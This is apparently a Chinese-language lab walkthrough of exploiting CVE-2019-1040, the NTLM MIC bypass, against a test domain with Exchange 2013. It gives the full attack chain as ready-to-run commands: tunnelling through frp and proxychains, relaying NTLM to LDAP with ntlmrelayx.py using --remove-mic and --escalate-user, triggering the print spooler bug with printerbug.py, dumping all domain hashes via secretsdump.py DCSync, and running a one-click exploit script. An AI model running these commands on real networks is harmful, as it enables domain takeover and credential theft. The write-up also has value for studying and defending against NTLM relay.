CVE-2019-1040内网大杀器利用

• 前言

前两天闲来无事重新在虚拟机搭建了一个域环境，装上了EXCHANGE2013版本，于是想着顺便复现一下大杀器。

• 背景描述：

2019年6月12日，微软官方在6月的补丁日中发布了漏洞 CVE-2019-1040的安全补丁，攻击者可以利用该漏洞绕过NTLM MIC（消息完整性检查）。攻击者可以修改NTLM身份验证流程中的签名要求，完全删除签名验证，并尝试中继到目标服务器，不强制执行签名的服务器都易受到攻击。通过这种攻击能使攻击者在仅有一个普通域账号的情况下可远程控制 Windows 域内的任何机器，包括域控服务器。

• 漏洞利用条件

1.已有域成员账号密码，存在一台exchange服务
2.已有域成员账号密码，目标域内存在两个域。
3.这里仅演示exchange

• 环境搭建

DC（exchange）192.168.1.104
Windows7 域内机器 192.168.1.102
Atttcker:Mac 192.168.1.100

漏洞利用过程

漏洞利用

• VPS搭建frp代理服务端

• Win7搭建代理隧道

• Atttcker proxychains4

• ntlmrelayx.py进行中继攻击

执行ntlmrelayx.py脚本进行NTLM中继攻击，设置SMB服务器并将认证凭据中继到LDAP协议。其中–remove-mic选项用于清除MIC标志，–escalate-user用于提升指定用户权限

proxychains4 python ntlmrelayx.py --escalate-user WIN7User -t ldap://AD.syst1m.local -smb2support --remove-mic --delegate-access

• Win7搭建代理隧道

• Atttcker frpc配置

• Proxifier添加隧道，代理frpc

• Atttcker 启动 frpc

• printerbug.py脚本

触发SpoolService的bug

python printerbug.py 域/用户名:密码@打印机服务ip 回连ip

proxychains4 python printerbug.py syst1m.local/WIN7User:[email protected] 192.168.1.102

SpoolService的bug导致Exchange服务器回连到ntlmrelayx.py，即将认证信息发送到ntlmrelayx.py

• ntlmrelayx.py结果

secretsdump.py去dcsync

• secretsdump

proxychains4 secretsdump.py syst1m.local/[email protected] -just-dc

CVE-2019-1040一键化脚本

来自evi1cg师傅写的利用工具

https://github.com/Ridter/CVE-2019-1040

• 使用方式

python CVE-2019-1040.py -ah 192.168.1.100 -u 'WIN7User' -p 'win7user521.' -d 'syst1m.local' -th 192.168.1.103 192.168.1.104

• 漏洞利用

参考

https://github.com/Ridter/CVE-2019-1040
https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/